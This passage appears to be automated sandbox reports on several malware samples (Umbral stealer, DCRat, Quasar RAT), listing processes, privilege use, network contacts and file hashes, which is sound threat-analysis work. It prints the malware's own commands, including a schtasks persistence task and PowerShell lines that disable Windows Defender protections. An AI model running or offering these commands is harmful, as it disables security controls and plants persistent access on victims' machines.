| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2880 wrote to memory of 2652 | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | C:\Windows\System32\Wbem\wmic.exe |
| PID 2880 wrote to memory of 2652 | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | C:\Windows\System32\Wbem\wmic.exe |
| PID 2880 wrote to memory of 2652 | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | C:\Windows\System32\Wbem\wmic.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe
"C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
memory/2880-0-0x000007FEF5543000-0x000007FEF5544000-memory.dmp
memory/2880-1-0x0000000001190000-0x00000000011D0000-memory.dmp
memory/2880-2-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp
memory/2880-3-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
95s
Max time network
145s
Command Line
Signatures
DcRat
Dcrat family
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe
"C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/2896-0-0x00007FFFAFF83000-0x00007FFFAFF85000-memory.dmp
memory/2896-1-0x0000000000230000-0x000000000043A000-memory.dmp
memory/2896-2-0x00007FFFAFF80000-0x00007FFFB0A41000-memory.dmp
memory/2896-4-0x000000001AEE0000-0x000000001AEEE000-memory.dmp
memory/2896-3-0x0000000000D00000-0x0000000000D0E000-memory.dmp
memory/2896-6-0x00007FFFAFF80000-0x00007FFFB0A41000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241023-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe
"C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
Network
| Country | Destination | Domain | Proto |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
| N/A | 192.168.1.55:4782 | N/A | tcp |
Files
memory/2600-0-0x000007FEF53B3000-0x000007FEF53B4000-memory.dmp
memory/2600-1-0x0000000000B90000-0x0000000000EB4000-memory.dmp
memory/2600-2-0x000007FEF53B0000-0x000007FEF5D9C000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 35110eedb3518d1905b88025bf11b77d |
| SHA1 | c39e96cc0dcb14065984c3d3fbff331070e37feb |
| SHA256 | 1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd |
| SHA512 | 08a3db05d373eb18f9b86fcea5b4338bd4cf3ca60df9906873bc0eb4d2dd6bc544890d23543df9be0848647d89a14d51010a7498bf8041c6872d8af768e035d2 |
memory/3048-8-0x0000000000960000-0x0000000000C84000-memory.dmp
memory/3048-9-0x000007FEF53B0000-0x000007FEF5D9C000-memory.dmp
memory/3048-10-0x000007FEF53B0000-0x000007FEF5D9C000-memory.dmp
memory/2600-11-0x000007FEF53B0000-0x000007FEF5D9C000-memory.dmp
memory/3048-12-0x000007FEF53B0000-0x000007FEF5D9C000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
149s
Max time network
144s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Umbral family
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2544 wrote to memory of 1936 | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | C:\Windows\System32\Wbem\wmic.exe |
| PID 2544 wrote to memory of 1936 | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | C:\Windows\System32\Wbem\wmic.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe
"C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/2544-0-0x00007FF822563000-0x00007FF822565000-memory.dmp
memory/2544-1-0x000001EFDE530000-0x000001EFDE570000-memory.dmp
memory/2544-2-0x00007FF822560000-0x00007FF823021000-memory.dmp
memory/2544-4-0x000001EFE0270000-0x000001EFE0372000-memory.dmp
memory/2544-5-0x00007FF822560000-0x00007FF823021000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
103s
Max time network
140s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Umbral family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe
"C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\193e069cb0734f2f4107d4c1fbb7f3b22d8783932eaa405bb7a0e52cb86fcfe1.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | N/A | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/3036-1-0x0000013057850000-0x0000013057890000-memory.dmp
memory/3036-0-0x00007FFCAECC3000-0x00007FFCAECC5000-memory.dmp
memory/3036-2-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ui4gvzh.5iw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3520-13-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
memory/3520-5-0x00000268AC4E0000-0x00000268AC502000-memory.dmp
memory/3520-14-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
memory/3520-15-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
memory/3520-18-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
memory/3520-19-0x00007FFCAECC0000-0x00007FFCAF781000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8a0407fd3b6a0e95729793e05880b558 |
| SHA1 | c704aff8e50b66cc5e7eaa51fe8fa41b0ef76ab6 |
| SHA256 | d641339de65c0d9ffd34a706fa9fcf408f2da61bdedf37fddad0ae9c8654e23e |
| SHA512 | a8cf10aa0ad92bb7a6dc4da5d8445bd2482864612071f525b3d0da92357dad56c1a690f8755e2dc138c044387871cdf8a3af6493af8bfbb2e34214eb809a0f72 |
memory/3036-33-0x0000013071FD0000-0x0000013072046000-memory.dmp
memory/3036-32-0x0000013071F80000-0x0000013071FD0000-memory.dmp
memory/3036-34-0x00000130596F0000-0x000001305970E000-memory.dmp
memory/3036-42-0x0000013059750000-0x0000013059762000-memory.dmp
memory/3036-41-0x0000013059720000-0x000001305972A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a58f982c18490e622e00d4eb75ace5a |
| SHA1 | 60c30527b74659ecf09089a5a7c02a1df9a71b65 |
| SHA256 | 4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d |
| SHA512 | ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480 |
